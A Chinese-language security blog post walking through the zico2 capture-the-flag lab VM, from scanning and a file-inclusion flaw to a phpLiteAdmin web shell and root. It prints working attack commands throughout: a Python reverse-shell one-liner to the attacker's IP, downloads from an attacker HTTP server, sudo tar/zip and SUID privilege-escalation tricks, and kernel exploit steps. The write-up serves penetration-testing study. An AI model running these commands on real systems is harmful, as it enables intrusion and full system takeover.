freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

红队渗透项目之zico2-1
2023-11-13 16:16:26

简介

该项目是Leon Johnson作者精心制作的项目,目标是获取获得root权限并找到flag.txt文本信息,该项目作为OSCP考试培训必打的一个项目环境,该作者评定该环境为渗透中级水准难度。接下来不管是零基础学习渗透者,还是有些基础的渗透者,甚至是高水平的渗透人员读该的技巧和文章都能学习到一些红队知识。

该项目有始有终会用到 信息收集 -> WEB信息枚举 -> 暴力破解 -> wpscan枚举 -> worepress站getshell -> 内网信息收集 -> 提权 ,最终拿到flag.txt的过程,那么在八大模块中用到了一些小技巧都会在文章中演示出来,希望大家能动手也来和我一起学习渗透。

请注意:

本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。

一、信息收集

信息收集非常重要,有了信息才能知道下一步该如何进行,接下来将用nmap来演示信息收集:

1、nmap扫描存活IP

由于本项目环境是nat模式需要项目IP地址,扫描挖掘本地的IP地址信息:

ifconfig

202209141347336.png

本机kali为192.168.4.128

发现本kali ip为40段!用40段进行全网段扫描:

nmap -sP 192.168.40.0/24

202209141347337.png

发现项目IP地址:192.168.40.130

2、nmap全端口服务枚举

进行namp端口服务枚举:

nmap 192.168.40.130 -p- -A

202209141347338.png

得到开放的端口信息:

22/tcp    open  ssh     OpenSSH 5.9p1
80/tcp    open  http    Apache httpd 2.2.22
111/tcp   open  rpcbind 2-4 (RPC #100000)
38935/tcp open  status  1 (RPC #100024)

二、Xray-web信息收集

1、web页面枚举

web页面访问:

http://192.168.40.130/

202209141347339.png

查看了下源码没什么信息!

2、xray扫描

xray 是一款功能强大的安全评估工具,主要特性有:

检测速度快。发包速度快; 漏洞检测算法高效。

支持范围广。大至 OWASP Top 10 通用漏洞检测,小至各种 CMS 框架 POC,均可以支持。

代码质量高。编写代码的人员素质高, 通过 Code Review、单元测试、集成测试等多层验证来提高代码可靠性。

高级可定制。通过配置文件暴露了引擎的各种参数,通过修改配置文件可以极大的客制化功能。

安全无威胁。xray 定位为一款安全辅助评估工具,而不是攻击工具,内置的所有payload 和 poc 均为无害化检查。

https://docs.xray.cool/#/README---xray使用手册

1)生成证书

执行下面命令生成两个证书:

./xray_linux_amd64 genca

202209141347340.png

2)将ca.crt 导入浏览器(推荐火狐)

202209141347341.png

202209141347342.png

202209141347343.png

202209141347344.png

3)设置代理

FoxyProxy配置xray 127.0.0.1 7777信息!

202209141347345.png

4)使用代理模式,运行程序:

./xray_linux_amd64 webscan --listen 127.0.0.1:7777 --html-output proxy.html
--html-output   输出报告格式
proxy.html   输出报过名,自定义

3、xray-LFI文件包含漏洞

随意点击页面,下方点击check out,扫描出漏洞目录地址:

http://192.168.253.174/view.php?page=tools.html

202209141347346.png

发现payload:../../../../../../../../../../../../../../../../../../etc/passwd

存在文件包含漏洞!

访问验证

http://192.168.40.130/view.php?page=./../../../../../../../../../../../../../../../../../etc/passwd

202209141347347.png

存在文件包含漏洞!

发现用户:zico274c.svg1000:1000:,,,:/home/zico:/bin/bash

三、dirb目录爆破

利用dirb爆破目录:

dirb http://192.168.40.130/

202209141347348.png

爆破结果发现类似数据库管理后台的目录,访问此目录!

http://192.168.40.130/dbadmin/

202209141347349.png

发现存在目录遍历,发现敏感文件test_db.php,点击打开这个php文件。

http://192.168.253.174/dbadmin/test_db.php

202209141347350.png

发现是个登录页面,phpLiteAdmin后台管理网站!

尝试弱口令登录:admin成功登录!

202209141347351.png

发现是一个SQLite数据库管理工具,phpLiteAdmin v1.9.3

四、漏洞搜索

1、phpLiteAdmin漏洞搜索

在kali上搜索一下phpLiteAdmin v1.9.3是否存在可以利用的漏洞

Searchsploit phpLiteAdmin

202209141347352.png

搜索发现:php/webapps/24044.txt

2、漏洞分析

复制至本地,查看利用方法

cp /usr/share/exploitdb/exploits/php/webapps/24044.txt .
 cat 24044.txt

202209141347353.png

POC提示:先创建数据库,在插入新表和写入shellcode

五、phpLiteAdmin反弹shell

1、写入一句话木马

1)创建数据库test.php

第一步左边创建一个test名称的php文件点击Create

202209141347354.png

2)创建新表

Name: 1   Number of Fields: 1   ---点击Go

202209141347355.png

3)创建PHP一句话代码

Field:填写任意名称   Type类型:Text    Default Value:放入shellcode:"",然后点击Create!

202209141347356.png

创建成功,目录地址为:/usr/databases/test.php

202209141347357.png

2、反弹shell

访问目录地址,触发一句话木马,执行cmd命令

http://192.168.40.130/view.php?page=../../../usr/databases/test&cmd=whoami

202209141347358.png

可以看到是www-data www-data权限!

查看有无安装python

http://192.168.40.130/view.php?page=../../../../../../usr/databases/test.php&cmd=which%20python

202209141347359.png

可以看到'"/usr/bin/python /usr/bin/python"'安装了python!

开启监听

nc -vlp 6666

202209141347360.png

执行python反弹shell,并执行tty

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.40.128",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c 'import pty; pty.spawn("/bin/bash")'

202209141347361.png

成功反弹获得普通用户的shell!

六、内网信息枚举

1、执行linpeas脚本

开启http服务,上传linpeas.sh至靶机

python -m SimpleHTTPServer 8082  
wget http://192.168.40.128:8082/linpeas.sh

202209141347362.png

上传成功!

赋权并执行

chmod +x linpeas.sh
./linpeas.sh

202209141347363.png

2、信息枚举

1)发现版本信息

Linux version 3.2.0-23-generic
Sudo version 1.8.3p1

202209141347364.png

2)发现开启了mysql服务

127.0.0.1:3306

202209141347365.png

3)获得账户密码

在/home/zico/wordpress/wp-config.php文件中发现账户密码

define('DB_USER', 'zico');
define('DB_PASSWORD', 'sWfCsfJSPV9H3AmQzw8');

202209141347366.png

七、提权

1、sudo提权zip

1)ssh登录:

ssh zico@192.168.40.130
sWfCsfJSPV9H3AmQzw8

202209141347367.png

2)查看sudo利用

sudo -l

202209141347368.png

这里给出了两种提升权限的方法tar和zip

User zico may run the following commands on this host:
    (root) NOPASSWD: /bin/tar
    (root) NOPASSWD: /usr/bin/zip

3)二进制列表zip利用提示

https://gtfobins.github.io/gtfobins/zip/

202209141347369.png

4)利用POC,获得flag

TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
cd /root
cat flag.txt

202209141347370.png

成功提权到root用户并获得flag

或者使用命令:

使用zip命令中可用的–unzip-command选项在压缩文件时运行bash shell:

sudo zip /tmp/nisha.zip /home/zico/dayu -T --unzip-command="sh -c /bin/bash"

2、sudo提权tar

1)二进制列表利用

https://gtfobins.github.io/gtfobins/tar/

202209141347371.png

2)尝试sudo利用

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash

202209141347372.png

成功提权至root!

3、sudo提权tar(find提权)

find提权 (其实这里也是使用了tar进行执行提权,然后转到find,重点是find执行命令提权)

1)查看是否存在find命令setuid执行权限:

find / -perm -4000 2>/dev/null | grep find

202209141347373.png

不存在!

2)通过tar命令创建find命令具备setuid执行权限:

cd /tmp
echo "chmod u+s /usr/bin/find" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1    -----创建两个文件,方便通过tar命令将此文件当做命令去执行!
sudo tar cf archive.tar *

202209141347374.png

3)创建完成确认find命令是否成功被赋予setuid权限:

find / -perm -4000 2>/dev/null | grep find

4)执行find命令开始提权

find /tmp -exec sh -i \;

202209141347375.png

成功提权至root用户。

1)内核提权

searchsploit Linux Kernel 3.2.0-23

linux_x86-64/local/33589.c

locate linux_x86-64/local/33589.c

cp /usr/share/exploitdb/exploits/linux_x86-64/local/33589.c .

python -m SimpleHTTPServer 8081

wget http://192.168.253.166:8081/33589.c

gcc 33589.c -O2 -o dayu1

chmod +x dayu1

./dayu1 0

执行完,直接CPU崩溃,系统重启!!!慎用!!

https://www.exploit-db.com/exploits/26131

locate linux_x86-64/local/26131.c

cp /usr/share/exploitdb/exploits/linux_x86-64/local/26131.c .

执行完,直接CPU崩溃,系统重启!!!慎用!!

# 漏洞 # 渗透测试 # web安全 # 内网渗透 # 漏洞分析
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录